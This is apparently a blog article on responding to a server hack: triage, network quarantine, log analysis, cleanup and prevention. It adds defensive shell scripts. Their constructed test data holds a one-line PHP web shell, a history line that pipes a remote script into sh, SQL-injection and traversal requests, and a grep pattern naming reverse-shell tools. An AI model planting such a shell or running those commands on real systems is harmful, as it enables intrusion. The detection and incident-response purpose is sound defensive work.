6 Critical Steps to Follow in Case of a Server Hack

As the mansion gets bigger, the number of windows a thief can break in through goes up.

This is exactly the case with the internet today. There has been a surge in the number of web languages, content management platforms and online applications, all for the benefit of you and me of course. But the inadvertent drawback of this expansion is a larger attack surface: there are now more vulnerabilities and more ways in for attackers than ever before.

As a server admin, you have numerous tools available to safeguard servers: anti-virus and anti-phishing software, encrypted (TLS) connections, hashed passwords and so on. But if you face a server hack anyway, perform these steps immediately to contain the damage and mitigate the threat.

Be Aware and Be Certain

There have been many instances where administrators and hosts were unaware their servers had been hacked. Not all hackers immediately demand a ransom or bombard users with malicious pop-ups; many keep quiet and use the server for as long as they can. If you notice any abnormal behaviour on your servers, or if you receive client complaints about unusual activity, check for a breach immediately. But what if the tell-tale signs aren't there? Try these checks to look for clues:

  • Check the mail queue. A sudden pileup of outbound mail usually means the server is being used to send spam
  • Check ALL your temporary and upload folders (/tmp, /var/tmp, /dev/shm, web upload directories) for scripts that should not be there. World-writable temp folders are a favourite drop location for hackers
  • Check log files for any record of the breach: unfamiliar source addresses, bursts of failed logins followed by a success, requests to files you never deployed
  • Check your process tree and listening ports for programs you did not start
  • Check email headers and mail logs for abnormal senders, recipients or volumes
  • Check the shell history of root and every user for commands you did not run (downloads, chmod +x, base64 decodes). Bear in mind the attacker may have cleared or disabled history; an empty or truncated history file is itself a clue
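The checks above, scripted for a Linux host, as an added example that is not part of the original article. It assumes a Postfix mail queue, Bash history files under /root and /home, and the temp and upload directories named in the script; adjust those for your servers. The make_sample function plants constructed files (a fake web shell and a fake history) so you can see what a hit looks like without touching a real host:

```shell
#!/bin/sh
# Added example (not from the original article). Post-compromise triage
# helpers for a Linux server; paths, extensions and the 7-day window are
# assumptions to tune for your environment.
set -u

# Script-like files modified in the last N days under a directory that
# should not normally hold scripts (temp dirs, upload dirs).
# usage: find_recent_scripts DIR [DAYS]
find_recent_scripts() {
    dir=$1; days=${2:-7}
    find "$dir" -xdev -type f -mtime "-$days" \
        \( -name '*.php' -o -name '*.phtml' -o -name '*.pl' -o -name '*.py' \
           -o -name '*.sh' -o -perm -100 \) 2>/dev/null || :
}

# Shell-history lines that look like staging: fetch a payload, make it
# executable, decode something, open a reverse shell.
# usage: suspicious_history HISTORY_FILE
suspicious_history() {
    grep -nE 'wget |curl |chmod \+x|base64 (-d|--decode)|nc (-e|-l)|/dev/tcp/|python[0-9.]* -c' "$1" 2>/dev/null || :
}

# Number of messages waiting in the mail queue (Postfix format: queue IDs
# are uppercase hex at the start of the line). A sudden pileup means spam.
mail_queue_depth() {
    if command -v postqueue >/dev/null 2>&1; then
        postqueue -p 2>/dev/null | grep -cE '^[0-9A-F]{8,}' || :
    else
        echo unknown
    fi
}

# Run every check against the live host. Read the process tree and the
# listening sockets by eye: look for names you did not install.
triage_all() {
    echo "== recently modified scripts in temp/upload dirs =="
    for d in /tmp /var/tmp /dev/shm /var/www/html/uploads; do
        if [ -d "$d" ]; then find_recent_scripts "$d" 7; fi
    done
    echo "== suspicious shell history =="
    for h in /root/.bash_history /home/*/.bash_history; do
        if [ -f "$h" ]; then echo "-- $h"; suspicious_history "$h"; fi
    done
    echo "== mail queue depth: $(mail_queue_depth) =="
    echo "== process tree =="
    ps -eo pid,ppid,user,etime,cmd --forest 2>/dev/null || ps aux
    echo "== listening sockets =="
    ss -ltnup 2>/dev/null || netstat -tulpn
}

# Plant constructed sample data so the checks can be exercised offline:
# a fake web shell and a fake history file (not real attacker artefacts).
# usage: make_sample DIR
make_sample() {
    d=$1
    printf '<?php eval($_POST["c"]); ?>\n' > "$d/sess_1a2b.php"
    printf 'hello\n' > "$d/notes.txt"
    printf 'ls -la\ncurl http://203.0.113.9/x.sh | sh\nchmod +x /tmp/.x\nexit\n' > "$d/bash_history"
}

case "${1:-}" in
    run)  triage_all ;;
    demo) t=$(mktemp -d); make_sample "$t"
          find_recent_scripts "$t"; suspicious_history "$t/bash_history"
          rm -rf "$t" ;;
esac
```

Run it with `run` on the suspect host (as root, so every home directory and the queue are readable) and with `demo` to see the planted sample flagged. Treat every hit as a lead to follow in the logs, not as proof on its own: a legitimate deploy can also drop a fresh .php file in an upload directory.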

Go Offline and Quarantine The Threat

Take a copy of the server exactly as it is right now (a disk snapshot or a full file backup, logs included) and keep it untouched as evidence. Then redirect incoming traffic to a temporary 'under maintenance' page served from another machine, so your clients' browsers stop talking to the compromised host. Bear in mind the copy you just took almost certainly contains the attacker's scripts as well. Do not restore from it. If you absolutely must recover individual files from it, scan and review each one first.

Your aim at this stage is to protect clients, hence the redirection. You should not, however, power the server off or wipe it until you have collected every bit of relevant information that may help you mitigate the threat and avoid future hacks: memory, running processes, open network connections and unsynced logs disappear on shutdown, and they are often what tells you how the attacker got in and what they did. Cut the server's network access instead, with firewall rules or a quarantine security group, and keep it running.
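A network quarantine that leaves the host running, as an added example that is not code from the original article. It uses iptables on the compromised Linux server itself; the admin address and SSH on port 22 are assumptions. Everything not explicitly allowed is dropped and logged, so the attacker's outbound connection attempts become evidence instead of traffic. The maintenance page must be served from a different machine, because this host will no longer answer on 80 or 443:

```shell
#!/bin/sh
# Added example (not from the original article). Isolate a compromised
# host with iptables without powering it off. Assumptions: the host is
# administered over SSH on port 22 from ONE trusted address, and the
# maintenance page is served elsewhere (DNS or load-balancer change).
set -u

# Print the ruleset for ADMIN_CIDR. Order matters: the allow rules for the
# admin session are added BEFORE the policies flip to DROP, so the
# session you are running this from is never cut.
# usage: quarantine_rules ADMIN_CIDR
quarantine_rules() {
    admin=$1
    cat <<EOF
iptables -F INPUT
iptables -F OUTPUT
iptables -F FORWARD
iptables -A INPUT  -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT  -s $admin -p tcp --dport 22 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -d $admin -p tcp --sport 22 -m conntrack --ctstate ESTABLISHED -j ACCEPT
iptables -A INPUT  -m limit --limit 10/min -j LOG --log-prefix "QUARANTINE-IN: " --log-level 4
iptables -A OUTPUT -m limit --limit 10/min -j LOG --log-prefix "QUARANTINE-OUT: " --log-level 4
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
EOF
}

# Apply the rules as root; abort on the first failure so a half-applied
# ruleset is obvious rather than silently permissive.
# usage: apply_quarantine ADMIN_CIDR
apply_quarantine() {
    quarantine_rules "$1" | sh -e
}

# Sanity check on a ruleset read from stdin: the SSH allow must come
# before the INPUT DROP policy. Exits 0 if the order is safe.
# usage: quarantine_rules 203.0.113.10/32 | check_order
check_order() {
    awk '/--dport 22 .*-j ACCEPT/ { seen_ssh = NR }
         /-P INPUT DROP/          { drop = NR }
         END { exit !(seen_ssh && drop && seen_ssh < drop) }'
}

case "${1:-}" in
    show)  quarantine_rules "${2:?admin CIDR required}" ;;
    apply) quarantine_rules "${2:?admin CIDR required}" | check_order && apply_quarantine "$2" ;;
esac
```

`show ADMIN_CIDR` prints the rules for review; `apply ADMIN_CIDR` applies them only after the ordering check passes. Existing connections that are not from the admin address, including any session the attacker still has open, die immediately because no general ESTABLISHED rule is kept, and every blocked attempt lands in the kernel log with the QUARANTINE prefix for the evidence file.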

Gather Information

Once a hack is confirmed, you might be tempted to shut down the infected server and take down the whole network. If it's your clients you are worried about, the previous step has already taken care of them. Isolate the affected server at the network level so it cannot reach other servers, and they cannot reach it. Once that is done, sweep the server to collect all information that might help you, and possibly the authorities, take action against the perpetrators.

Gather and read all system, web server, mail and antivirus logs, and search them for indicators: the attacker's IP addresses, failed logins followed by a success, requests to scripts you never deployed, commands embedded in web requests, and the time the first suspicious entry appears. Work outward from each indicator: once you have an attacker address, find everything else it touched. Run an up-to-date anti-virus scan to get a fresh report. You can also approach a third party for help analysing the evidence.
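Searching the logs for those indicators, as an added example that is not from the original article. It runs grep, sed and awk over a constructed Apache access log and sshd auth log (written by write_sample_logs; the traffic is invented and the addresses are documentation ranges), and assumes the combined log format and the stock OpenSSH "Failed password ... from IP port N" and "Accepted ..." message text:

```shell
#!/bin/sh
# Added example (not from the original article). Pull indicators of
# compromise out of web and SSH logs, then pivot on the attacker address.
# Assumes Apache/nginx combined log format and OpenSSH's standard
# "Failed password for ... from IP port N" / "Accepted ..." messages.
set -u

# Requests carrying classic attack signatures: SQL injection, directory
# traversal, reads of /etc/passwd, scanner user agents, and POSTs to PHP
# files inside an upload directory (where no PHP should ever execute).
# usage: flag_web_requests ACCESS_LOG
flag_web_requests() {
    grep -iE 'union(%20|[+]| )+select|\.\./|%2e%2e|/etc/passwd|"POST /uploads/[^ ]*\.php|sqlmap|nikto' "$1" || :
}

# Source addresses ranked by number of failed SSH logins.
# usage: top_failed_ssh_sources AUTH_LOG
top_failed_ssh_sources() {
    sed -n 's/.*Failed password for .* from \([0-9.]*\) port.*/\1/p' "$1" | sort | uniq -c | sort -rn
}

# Addresses that failed SSH logins and then got one accepted: the classic
# signature of a successful password-guessing attack.
# usage: accepted_after_failures AUTH_LOG
accepted_after_failures() {
    sed -n 's/.*Failed password for .* from \([0-9.]*\) port.*/\1/p' "$1" | sort -u |
    while read -r ip; do
        grep -q "Accepted .* from $ip port" "$1" && echo "$ip"
    done || :
}

# Pivot: every web request from one address, in order, so you can see
# the first probe, the exploit and what the attacker did afterwards.
# usage: requests_from IP ACCESS_LOG
requests_from() {
    grep -F "$1 - " "$2" || :
}

# Constructed sample logs (invented traffic, documentation IP ranges).
# usage: write_sample_logs DIR
write_sample_logs() {
    cat > "$1/access.log" <<'EOF'
203.0.113.5 - - [12/Mar/2019:10:01:02 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Mar/2019:10:01:09 +0000] "GET /index.php?id=1%20UNION%20SELECT%20user,pass%20FROM%20users HTTP/1.1" 200 7201 "-" "sqlmap/1.2"
198.51.100.7 - - [12/Mar/2019:10:02:15 +0000] "GET /about.html HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Mar/2019:10:03:44 +0000] "POST /uploads/sess.php HTTP/1.1" 200 43 "-" "curl/7.58.0"
198.51.100.9 - - [12/Mar/2019:10:04:01 +0000] "GET /../../etc/passwd HTTP/1.1" 404 120 "-" "Mozilla/5.0"
EOF
    cat > "$1/auth.log" <<'EOF'
Mar 12 09:58:01 web1 sshd[2201]: Failed password for root from 203.0.113.5 port 40122 ssh2
Mar 12 09:58:03 web1 sshd[2203]: Failed password for invalid user admin from 203.0.113.5 port 40130 ssh2
Mar 12 09:58:05 web1 sshd[2205]: Failed password for root from 198.51.100.9 port 51000 ssh2
Mar 12 09:58:09 web1 sshd[2207]: Accepted password for root from 203.0.113.5 port 40140 ssh2
EOF
}

case "${1:-}" in
    demo)
        t=$(mktemp -d); write_sample_logs "$t"
        echo "== flagged requests =="; flag_web_requests "$t/access.log"
        echo "== failed SSH logins by source =="; top_failed_ssh_sources "$t/auth.log"
        echo "== failed, then accepted =="; accepted_after_failures "$t/auth.log"
        for ip in $(accepted_after_failures "$t/auth.log"); do
            echo "== all requests from $ip =="; requests_from "$ip" "$t/access.log"
        done
        rm -rf "$t" ;;
esac
```

In the sample, 203.0.113.5 probes with sqlmap, guesses the root password over SSH, and then POSTs to a PHP file under /uploads: the pivot shows the whole sequence, and the timestamp of its first request is where to start reading the rest of the logs. Point the functions at /var/log/apache2/access.log (or the nginx equivalent) and /var/log/auth.log on a real host, and remember the attacker may have edited those files; compare them with the copies in your evidence snapshot and any remote syslog.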

Clean Up

The logs and reports should point you to the point of failure: the file or application the attacker came in through, and the files they changed. Take down those files and restore them from the latest CLEAN back-up, one taken before the compromise. If the point of breach is not clear, it is wiser to rebuild the server completely from a clean back-up or image than to patch files one by one, because anything you miss gives the attacker a way back in. You can then use the back-up that was taken after the hack to restore missing data one file at a time, checking every file or application for malicious content before it goes back. Whatever you restore, also close the hole that let the attacker in (update the vulnerable application, fix the configuration, remove the weak account); restoring clean files onto the same vulnerability just invites the next hack.

Change all admin and user passwords, and make sure they are complex: long, with a mixture of letters, numbers and special characters. Rotate everything else the attacker could have read from the server as well: database credentials, API keys, SSH keys and application secrets, and invalidate existing sessions. If hackers managed to mine sensitive information like passwords or keys, they will use it to walk straight back in, or to try it against your other systems.

Restoration of Service

Restore the landing page so your visitors and clients can access the website and applications again. It's a good idea to publish a note on the landing page informing clients that passwords have been reset, and to email each user a one-time password reset link; never send the new password itself by email. Depending on company policy, and on any breach-notification obligations that apply to the data involved, you can decide how much to divulge about the events that caused the temporary downtime.

Prevention

A hack is never pretty. Even without damaging any files or stealing information, hackers leave behind a mess, and the interruption to clients is enough damage as it is. To ensure you do not fall prey to hackers again, make sure you are using secure (TLS) connections, your PHP and database code passes user input only through parameterized queries (SQL injection remains an easy way in), the plugins you use come from trusted developers and are kept up to date, your software is patched promptly, and your password policy strictly allows only complex passwords.

With a little bit of care and some proactive measures, you greatly reduce the chance of a hack.
